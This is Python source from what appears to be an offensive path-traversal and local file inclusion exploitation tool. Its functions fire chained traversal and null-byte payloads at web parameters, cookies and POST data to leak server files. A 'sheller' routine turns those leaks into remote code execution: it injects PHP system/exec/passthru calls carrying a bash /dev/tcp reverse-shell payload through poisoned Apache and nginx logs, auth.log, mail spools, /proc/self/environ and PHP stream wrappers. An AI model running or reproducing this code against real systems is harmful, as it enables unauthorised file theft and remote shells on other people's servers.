# only root directory, else false positives
splitted = url.split("://")
ulist = splitted[1].split("/")
last = ulist[-1]
# delete file, but not hidden directory
if "." in last and not last.startswith(".") and last != ulist[0]:
del ulist[-1]
url = splitted[0] + "://" + "/".join(ulist)
if not url.endswith("/"):
url += "/"
# initialize lists & session
found = []
urls = []
s = session()
if authcookie != "":
tmpjar = cookieFromFile(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
# initial ping for filecheck
if attack != 4:
try:
con2 = s.get(url, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
else:
try:
con2 = s.post(url, data={}, timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
con3 = None
if attack == 1:
try:
con3 = s.get(url + "?" + keyword + "=vailyn" + url2,
timeout=timeout).content
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
sys.exit("Timeout on initial check.")
try:
for dir in dirs:
files = filegen(filespath)
for file in files:
d = 1
while d <= depth:
for i in selected_payloads:
traverse = ''
j = 1
# chain traversal payloads
while j <= d:
traverse += i
j += 1
# send attack requests - with or without nullbyte injection
requestlist = []
if selected_nullbytes == []:
data = {}
if attack == 1:
prep, p = query(traverse, dir, file, "",
keyword, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, dir, file, "", url,
url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 3:
p = traverse + dir + file
s.cookies.set(selected, traverse + dir + file)
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + dir + file
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
req = requests.Request(method='POST',
url=url,
data=data)
prep = s.prepare_request(req)
newBody = unquote(prep.body)
prep.body = newBody
prep.headers["content-length"] = len(
newBody)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout reached for " + url)
continue
try:
requestlist.append((r, p, data))
except Exception:
pass
else:
for nb in selected_nullbytes:
data = {}
if attack == 1:
prep, p = query(traverse, dir, file, nb,
keyword, url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
elif attack == 2:
prep, p = inpath(traverse, dir, file, nb,
url, url2, s)
try:
random_ua(s)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
elif attack == 3:
p = traverse + dir + file + nb
s.cookies.set(selected,
traverse + dir + file + nb)
try:
random_ua(s)
r = s.get(url, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
elif attack == 4:
p = traverse + dir + file + nb
for prop in postdata.split("&"):
pair = prop.split("=")
if pair[1].strip() == "INJECT":
pair[1] = p
data[pair[0].strip()] = pair[1].strip()
assert data != {}
try:
random_ua(s)
req = requests.Request(method='POST',
url=url,
data=data)
prep = s.prepare_request(req)
newBody = unquote(prep.body)
prep.body = newBody
prep.headers["content-length"] = len(
newBody)
r = s.send(prep, timeout=timeout)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
try:
requestlist.append((r, p, data))
except Exception:
pass
# analyze result
for (r, p, data) in requestlist:
lock.acquire()
try:
requestcount += 1
if gui:
progressgui(requestcount, totalrequests,
gui)
else:
if sys.platform.lower().startswith('win'):
if requestcount % 1000 == 0:
progresswin(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
else:
progress(requestcount,
totalrequests,
prefix=" ",
suffix=" ")
finally:
lock.release()
vfound = False
if str(r.status_code).startswith("2"):
if (filecheck(r, con2, con3, p) and attack != 4
or
filecheck(r, con2, con3, p, post=True)
and attack == 4):
vfound = True
if attack == 1 or attack == 2:
print(color.RD + "[INFO]" + color.O +
" leak" + color.END + " " +
color.RD + "statvs-code" +
color.END + "=" + color.O +
str(r.status_code) + color.END +
" " + color.R + "site" +
color.END + "=" + r.url)
if dl and dir + file not in found:
download(r.url,
dir + file,
cookie=s.cookies)
found.append(dir + file)
if attack == 1:
urls.append(color.RD + "[pl]" +
color.END + color.O +
" " +
str(r.status_code) +
color.END + " " +
r.url.split(keyword +
"=")
[1].replace(url2, ""))
else:
vlnlist = r.url.split("/")[1::]
vlnpath = ("/".join(
i for i in vlnlist)).replace(
url2, "")
urls.append(color.RD + "[pl]" +
color.END + color.O +
" " +
str(r.status_code) +
color.END + " " +
vlnpath)
elif attack == 3:
s.cookies.set(selected, p)
print(color.RD + "[INFO]" + color.O +
" leak" + color.END + " " +
color.RD + "statvs-code" +
color.END + "=" + color.O +
str(r.status_code) + color.END +
" " + color.R + "cookie" +
color.END + "=" + p)
if dl and dir + file not in found:
download(r.url,
dir + file,
cookie=s.cookies)
found.append(dir + file)
urls.append(color.RD + "[pl]" +
color.END + color.O + " " +
str(r.status_code) +
color.END + " " + p)
elif attack == 4:
print(color.RD + "[INFO]" + color.O +
" leak" + color.END + " " +
color.RD + "statvs-code" +
color.END + "=" + color.O +
str(r.status_code) + color.END +
" " + color.R + "postdata" +
color.END + "=" + p)
if dl and dir + file not in found:
download(r.url,
dir + file,
cookie=s.cookies,
post=data)
found.append(dir + file)
urls.append(color.RD + "[pl]" +
color.END + color.O + " " +
str(r.status_code) +
color.END + " " + p)
if verbose and not vfound:
if attack == 1 or attack == 2:
print(color.END +
"{}|: ".format(r.status_code) +
r.url)
elif attack == 3 or attack == 4:
print(color.END +
"{}|: ".format(r.status_code) +
r.url + " : " + p)
d += 1
return (found, urls)
except KeyboardInterrupt:
return (found, urls)
def sheller(
technique, attack, url, url2, keyword, cookie, selected,
verbose, paylist, nullist, wlist,
authcookie, post_data, depth, gui, app
):
"""
second exploitation module: try to gain a
reverse shell over the system
@params:
technique - technique index (see variables.rce)
"""
# TODO clean me up
url = fix_url(url, attack)
s = session()
timeout = vars.timeout
success = None
print(
color.RD+"[INFO]" + color.O + " RCE" + color.END
+ color.RD + "|" + color.END + " "
+ color.RC + "Using Technique:" + color.END + color.O
+ "" + str(rce[technique]) + color.END
)
if gui:
gui.crawlerResultDisplay.append(
"[Info] RCE| Using Technique: {}".format(
str(rce[technique])
)
)
gui.show()
app.processEvents()
if technique == 1:
file = "/proc/self/environ"
elif technique == 2:
file = "/var/log/apache2/access.log"
elif technique == 3:
file = "/var/log/auth.log"
elif technique == 4:
file = "/var/mail/www-data"
elif technique == 5:
file = "/var/log/nginx/access.log"
elif technique == 6:
success = ["something here"]
if authcookie != "":
tmpjar = cookie_from_file(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
con2, con3 = initial_ping(
s, attack, url, url2, keyword, timeout,
)
if technique != 6:
sys.stdout.write("{0} └── Looking for Log File:{1}".format(
color.RD, color.END
))
for i in paylist:
d = 1
while d <= depth:
traverse = ""
j = 1
# chain traversal payloads
while j <= d:
traverse += i
j += 1
# send attack requests - no nullbyte injection
requestlist = []
for prefix in wlist:
combined = prefix + traverse
if nullist == []:
try:
requestlist += attack_request(
s, attack, url, url2, keyword,
selected, combined, file, "", "",
post_data, timeout, sheller=True,
)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
else:
for nb in nullist:
try:
requestlist += attack_request(
s, attack, url, url2, keyword,
selected, combined, file, "", nb,
post_data, timeout, sheller=True,
)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
# analyze result
found = False
for (r, p, nb, data, traverse) in requestlist:
if attack == 3:
s.cookies.set(selected, p)
if str(r.status_code).startswith("2"):
if (
filecheck(r, con2, con3, p)
and attack != 4
or filecheck(r, con2, con3, p, post=True)
and attack == 4
):
success = (r, p, nb, data, traverse)
found = True
break
if verbose:
if attack == 1 or attack == 2:
print(color.END + "{}|: ".format(
r.status_code) + r.url
)
elif attack == 3 or attack == 4:
print(color.END + "{}|: ".format(
r.status_code)+r.url + " : " + p
)
d += 1
if found:
sys.stdout.write(
"{0} OK {2}|{1}\n".format(
color.O, color.END, color.END + color.RD
)
)
break
if success:
PAYLOAD = "bash -i >& /dev/tcp/{}/{} 0>&1".format(
vars.LISTENIP, vars.LISTENPORT,
)
if technique != 6:
if attack == 1:
prep = query(
success[4], "", file, success[2], keyword,
url, url2, s,
)[0]
elif attack == 2:
prep = inpath(
success[4], "", file, success[2], url,
url2, s,
)[0]
elif attack == 3:
s.cookies.set(selected, success[1])
req = requests.Request(method="GET", url=url)
prep = s.prepare_request(req)
elif attack == 4:
req = requests.Request(
method="POST", url=url, data=success[3]
)
prep = s.prepare_request(req)
new_body = unquote(prep.body)
prep.body = new_body
prep.headers["content-length"] = len(new_body)
if technique == 1:
prep.headers[
"User-agent"
] = '<?php system("{}"); ?>'.format(PAYLOAD)
sys.stdout.write("{0} : Trying system():{1} ".format(
color.RD, color.END
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format("system(): ")
)
gui.show()
app.processEvents()
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
show_status(gui, timeout=True)
if app:
app.processEvents()
prep.headers[
"User-agent"
] = '<?php exec("{}"); ?>'.format(PAYLOAD)
sys.stdout.write("{0} : Trying exec():{1} ".format(
color.RD, color.END,
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format("exec(): ")
)
gui.show()
app.processEvents()
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
show_status(gui, timeout=True)
if app:
app.processEvents()
prep.headers[
"User-agent"
] = '<?php passthru("{}"); ?>'.format(PAYLOAD)
sys.stdout.write("{0} : Trying passthru():{1} ".format(
color.RD, color.END
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format("passthru(): ")
)
gui.show()
app.processEvents()
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
show_status(gui, timeout=True)
if app:
app.processEvents()
elif technique == 2 or technique == 5:
req = requests.Request(method="GET", url=url)
prep2 = s.prepare_request(req)
prep2.url = url + "/" + '<?php system("{}"); ?>'.format(PAYLOAD)
sys.stdout.write("{0} : Trying system():{1} ".format(
color.RD, color.END,
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format("system(): "),
)
gui.show()
app.processEvents()
try:
s.send(prep2, timeout=timeout)
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
show_status(gui, timeout=True)
if app:
app.processEvents()
prep2.url = url + "/" + '<?php exec("{}"); ?>'.format(PAYLOAD)
sys.stdout.write(
"{0} : Trying exec():{1} ".format(
color.RD, color.END
)
)
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format("exec(): ")
)
gui.show()
app.processEvents()
try:
s.send(prep2, timeout=timeout)
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
show_status(gui, timeout=True)
if app:
app.processEvents()
prep2.url = url + "/" + '<?php passthru("{}"); ?>'.format(PAYLOAD)
sys.stdout.write("{0} : Trying passthru(): {1}".format(
color.RD, color.END
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format("passthru(): ")
)
gui.show()
app.processEvents()
try:
s.send(prep2, timeout=timeout)
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
show_status(gui, timeout=True)
if app:
app.processEvents()
elif technique == 3:
tmp = url.split("://")[1]
if "@" in tmp:
tmp = tmp.split("@")[1]
host = tmp.split("/")[0].split(":")[0]
sshs = [
'<?php system("{}"); ?>@{}'.format(PAYLOAD, host),
'<?php exec("{}"); ?>@{}'.format(PAYLOAD, host),
'<?php passthru("{}"); ?>@{}'.format(PAYLOAD, host)
]
ssht = [
"system(): ",
"exec(): ",
"passthru(): "
]
for i in range(0, len(sshs)):
sys.stdout.write("{0} : Trying {2}{1}".format(
color.RD, color.END, ssht[i]
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format(ssht[i])
)
gui.show()
app.processEvents()
try:
if is_windows:
subprocess.run(
["putty.exe", "-ssh", sshs[i]]
)
else:
subprocess.run(["ssh", sshs[i]])
except Exception as e:
show_status(gui, exception=e)
if app:
app.processEvents()
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError,
):
show_status(gui, timeout=True)
if app:
app.processEvents()
elif technique == 4:
tmp = url.split("://")[1]
if "@" in tmp:
tmp = tmp.split("@")[1]
topics = [
'I<3shells <?php system("{}"); ?>'.format(PAYLOAD),
'I<3shells <?php exec("{}"); ?>'.format(PAYLOAD),
'I<3shells <?php passthru("{}"); ?>'.format(PAYLOAD)
]
topict = [
"system(): ",
"exec(): ",
"passthru(): "
]
host = tmp.split("/")[0].split(":")[0]
for i in range(0, len(topics)):
sys.stdout.write("{0} : Trying {2}{1}".format(
color.RD,
color.END,
topict[i]
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format(topict[i])
)
gui.show()
app.processEvents()
try:
p = subprocess.Popen(
["echo", "Uno reverse shell"],
stdout=subprocess.PIPE,
)
subprocess.call(
[
"mail",
"-s", topics[i],
"www-data@{}".format(host)
],
stdin=p.stdout,
)
except Exception as e:
show_status(gui, exception=e)
if app:
app.processEvents()
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
show_status(gui, timeout=True)
if app:
app.processEvents()
elif technique == 6:
wrappersPart1 = [
'expect://{}'.format(PAYLOAD),
'data://text/plain,<?php system'
'("{}"); ?>'.format(PAYLOAD),
'data://text/plain,<?php exec'
'("{}"); ?>'.format(PAYLOAD),
'data://text/plain,<?php passthru'
'("{}"); ?>'.format(PAYLOAD),
'data://text/plain;base64,' + encode64(
'<?php system("{}"); ?>'.format(PAYLOAD)
),
'data://text/plain;base64,' + encode64(
'<?php exec("{}"); ?>'.format(PAYLOAD)
),
'data://text/plain;base64,' + encode64(
'<?php passthru("{}"); ?>'.format(PAYLOAD)
)
]
namesPart1 = [
"expect: ",
"data.system(): ",
"data.exec(): ",
"data.passthru(): ",
"data.b64.system(): ",
"data.b64.exec(): ",
"data.b64.passthru(): "
]
for i in range(0, len(wrappersPart1)):
wrapper = wrappersPart1[i]
sys.stdout.write("{0} : {2}{1}".format(
color.RD, color.END, namesPart1[i]
))
if gui:
gui.crawlerResultDisplay.append(
" : {}".format(namesPart1[i])
)
gui.show()
app.processEvents()
if attack == 1:
prep = query(
"", "", wrapper, "", keyword, url, url2, s
)[0]
elif attack == 2:
prep = inpath("", "", wrapper, "", url, url2, s)[0]
elif attack == 3:
s.cookies.set(selected, wrapper)
req = requests.Request(method="GET", url=url)
prep = s.prepare_request(req)
elif attack == 4:
req = requests.Request(
method="POST",
url=url,
data=wrapper,
)
prep = s.prepare_request(req)
new_body = unquote(prep.body)
prep.body = new_body
prep.headers["content-length"] = len(new_body)
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
show_status(gui, timeout=True)
if app:
app.processEvents()
wrapper = "php://input"
payloads = [
'<?php system("{}"); ?>'.format(PAYLOAD),
'<?php exec("{}"); ?>'.format(PAYLOAD),
'<?php passthru("{}"); ?>'.format(PAYLOAD)
]
names = [
"php input.system(): ",
"php input.exec(): ",
"php input.passthru(): "
]
for i in range(0, len(payloads)):
sys.stdout.write("{0} : {2}{1}".format(
color.RD, color.END, names[i]
))
if gui:
gui.crawlerResultDisplay.append(
" : Trying {}".format(names[i])
)
gui.show()
app.processEvents()
if attack == 1:
if "?" not in url:
cont = "?" + keyword + "=" + wrapper + url2
else:
cont = "&" + keyword + "=" + wrapper + url2
req = requests.Request(
method="POST",
url=url + cont,
data=payloads[i]
)
prep = s.prepare_request(req)
elif attack == 3:
s.cookies.set(selected, wrapper)
req = requests.Request(
method="POST",
url=url + cont,
data=payloads[i]
)
prep = s.prepare_request(req)
else:
prep = None
if prep:
try:
s.send(prep, timeout=timeout)
show_status(gui)
if app:
app.processEvents()
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
show_status(gui, timeout=True)
if app:
app.processEvents()
else:
show_status(
gui,
exception="Attack vector not supported."
)
if app:
app.processEvents()
else:
sys.stdout.write("{0} FAIL{2}|{1}\n".format(
color.O, color.END, color.END + color.RD
))
if gui:
gui.crawlerResultDisplay.append(" FAIL\n")
gui.show()
app.processEvents()
def phase2(
attack, url, url2, keyword, cookie, selected, filespath,
dirs, depth, verbose, dl, selected_payloads,
selected_nullbytes, selected_prefixes, authcookie,
post_data, dirlen, gui
):
"""
[Phase 2]: Exploitation
@params:
attack - attack mode
url - target part 1
url2 - target part 2
keyword - -p PAM (only for -a 1)
cookie - cookiejar for -a 3
selected - selected cookie to be poisoned
filespath - file list
dirs - directory list
depth - attack depth
verbose - print 404s?
dl - download found files?
selected_payloads - payloads selected in phase 1
selected_nullbytes - terminators selected in phase 1
selected_prefixes - PHP wrappers selected in phase 1
authcookie - Authentication Cookie File
post_data - POST Data for --attack 4
dirlen - directory dictionary size (after permutations)
gui - GUI frame to set the graphical progress bar
"""
# variables for the progress counter
global request_count
timeout = vars.timeout
fileslen = sum(1 for dummy in filegen(filespath))
if len(selected_nullbytes) == 0:
total_requests = len(selected_payloads) * fileslen * dirlen * depth
else:
total_requests = len(selected_payloads) * len(selected_nullbytes)
total_requests = total_requests * fileslen * dirlen * depth
total_requests *= len(selected_prefixes)
if gui:
lock.acquire()
try:
gui.progressBar.reset()
gui.progressBar.setMinimum(0)
gui.progressBar.setMaximum(total_requests)
finally:
lock.release()
url = fix_url(url, attack)
# initialize lists & session
found = []
urls = []
s = session()
if authcookie != "":
tmpjar = cookie_from_file(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
con2, con3 = initial_ping(s, attack, url, url2, keyword, timeout)
try:
for dir in dirs:
files = filegen(filespath)
for file in files:
d = 1
while d <= depth:
for i in selected_payloads:
traverse = ""
j = 1
# chain traversal payloads
while j <= d:
traverse += i
j += 1
# send attack requests - with or without
# nullbyte injection
requestlist = []
for prefix in selected_prefixes:
combined = prefix + traverse
if selected_nullbytes == []:
try:
requestlist += attack_request(
s, attack, url, url2, keyword,
selected, combined, file, dir, "",
post_data, timeout, phase2=True,
)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
else:
for nb in selected_nullbytes:
try:
requestlist += attack_request(
s, attack, url, url2, keyword,
selected, combined, file, dir, nb,
post_data, timeout, phase2=True,
)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
continue
# analyze result
for (r, p, data) in requestlist:
lock.acquire()
try:
request_count += 1
if gui:
progress_gui(
request_count,
total_requests,
gui,
)
else:
if is_windows:
if request_count % 1000 == 0:
progress_win(
request_count,
total_requests,
prefix=" ", suffix=" ",
)
else:
progress(
request_count,
total_requests,
prefix=" ", suffix=" ",
)
finally:
lock.release()
vfound = False
if str(r.status_code).startswith("2"):
if (
filecheck(r, con2, con3, p)
and attack != 4
or filecheck(r, con2, con3, p, post=True)
and attack == 4
):
vfound = True
if attack == 1 or attack == 2:
print(
color.RD+"[INFO]" + color.O
+ " leak" + color.END + " "
+ color.RD + "statvs-code"
+ color.END + "=" + color.O
+ str(r.status_code)
+ color.END + " " + color.R
+ "site" + color.END + "="
+ r.url
)
if dl and dir + file not in found:
download(
r.url,
dir + file,
cookie=s.cookies,
)
found.append(dir + file)
if attack == 1:
urls.append(
color.RD + "[pl]"
+ color.END + color.O + " "
+ str(r.status_code)
+ color.END + " "
+ r.url.split(
keyword + "="
)[1].replace(url2, ""))
else:
vlnlist = r.url.split("/")[1::]
vlnpath = (
"/".join(i for i in vlnlist)
).replace(url2, "")
urls.append(
color.RD + "[pl]" + color.END
+ color.O + " "
+ str(r.status_code)
+ color.END + " " + vlnpath
)
elif attack == 3:
s.cookies.set(selected, p)
print(
color.RD + "[INFO]" + color.O
+ " leak" + color.END + " "
+ color.RD + "statvs-code"
+ color.END + "=" + color.O
+ str(r.status_code) + color.END
+ " " + color.R + "cookie" +
color.END + "=" + p
)
if dl and dir + file not in found:
download(
r.url,
dir + file,
cookie=s.cookies,
)
found.append(dir + file)
urls.append(
color.RD + "[pl]" + color.END
+ color.O + " "
+ str(r.status_code)
+ color.END + " " + p
)
elif attack == 4:
print(
color.RD + "[INFO]" + color.O
+ " leak" + color.END + " "
+ color.RD + "statvs-code"
+ color.END + "=" + color.O
+ str(r.status_code) + color.END
+ " " + color.R + "post_data"
+ color.END + "=" + p
)
if dl and dir + file not in found:
download(
r.url,
dir + file,
cookie=s.cookies,
post=data,
)
found.append(dir + file)
urls.append(
color.RD + "[pl]" + color.END
+ color.O + " "
+ str(r.status_code)
+ color.END + " " + p
)
if verbose and not vfound:
if attack == 1 or attack == 2:
print(color.END + "{}|: ".format(
r.status_code) + r.url,
)
elif attack == 3 or attack == 4:
print(color.END + "{}|: ".format(
r.status_code) + r.url + " : " + p
)
d += 1
return (found, urls)
except KeyboardInterrupt:
return (found, urls)
def phase1(
attack, url, url2, keyword, cookie, selected, verbose,
depth, paylist, file, authcookie, post_data, gui
):
"""
[Phase 1]: Vulnerability Analysis
@params:
attack - attack mode (-a ACK)
url - target part 1 (-v VIC)
url2 - target part 2 (-q VIC2)
keyword - -p PAM (only for -a 1)
cookie - cookiejar for -a 3
selected - selected cookie to be poisoned
verbose - print 404s?
depth - attack depth (-d INT)
paylist - payload list (all)
file - file to be looked up (-i FIL, default: /etc/passwd)
authcookie - Authentication Cookie File to bypass Login Screens
post_data - POST Data for --attack 4
gui - GUI frame to set the graphical progress bar
"""
# variables for the progress counter
global request_count
precise = vars.precise
prefixes = [""]
if vars.lfi:
prefixes += phase1_wrappers
total_requests = len(payloadlist) * (len(nullchars) + 1) * len(prefixes)
if not precise:
total_requests = total_requests * (depth)
timeout = vars.timeout
if gui:
lock.acquire()
try:
gui.progressBar.reset()
gui.progressBar.setMinimum(0)
gui.progressBar.setMaximum(total_requests)
finally:
lock.release()
url = fix_url(url, attack)
# initialize lists & session
payloads = []
nullbytes = []
found_prefixes = []
s = session()
if authcookie != "":
tmpjar = cookie_from_file(authcookie)
for cookie in tmpjar:
s.cookies.set_cookie(cookie)
con2, con3 = initial_ping(s, attack, url, url2, keyword, timeout)
for i in paylist:
if precise:
layers = [depth]
else:
layers = list(range(1, depth + 1))
for d in layers:
traverse = ""
j = 1
# chain traversal payloads
while j <= d:
traverse += i
j += 1
# send attack requests - no nullbyte injection
requestlist = []
for prefix in prefixes:
combined = prefix + traverse
try:
requestlist += attack_request(
s, attack, url, url2, keyword, selected,
combined, file, "", "", post_data,
timeout, w=prefix,
)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
# repeat for nullbytes
for nb in nullchars:
try:
requestlist += attack_request(
s, attack, url, url2, keyword, selected,
combined, file, "", nb, post_data,
timeout, w=prefix,
)
except (
requests.exceptions.Timeout,
requests.exceptions.ConnectionError
):
print("Timeout reached for " + url)
# analyze result
found = False
for (r, p, nb, w) in requestlist:
lock.acquire()
try:
request_count += 1
if gui:
progress_gui(request_count, total_requests, gui)
else:
if is_windows:
if request_count % 1000 == 0:
progress_win(
request_count,
total_requests,
prefix=" ", suffix=" ",
)
else:
progress(
request_count,
total_requests,
prefix=" ", suffix=" ",
)
finally:
lock.release()
if str(r.status_code).startswith("2"):
if (
filecheck(r, con2, con3, p)
and attack != 4
or filecheck(r, con2, con3, p, post=True)
and attack == 4
):
payloads.append(i)
if nb != "":
nullbytes.append(nb)
if w != "":
found_prefixes.append(w)
found = True
out = color.RD + "[pl]" + color.END + color.O
out = out + " " + str(r.status_code) + color.END + " "
out = out + "{0:{1}}".format(i, maxlen) + " "
out = out + "{0:{1}}".format(nb, nullen) + " " + w
print(out)
if verbose and not found:
if attack == 1 or attack == 2:
print(color.END + "{}|: ".format(r.status_code)+r.url)
elif attack == 3 or attack == 4:
print(color.END + "{}|: ".format(
r.status_code)+r.url + " : " + p
)
if found:
break
return (payloads, nullbytes, found_prefixes)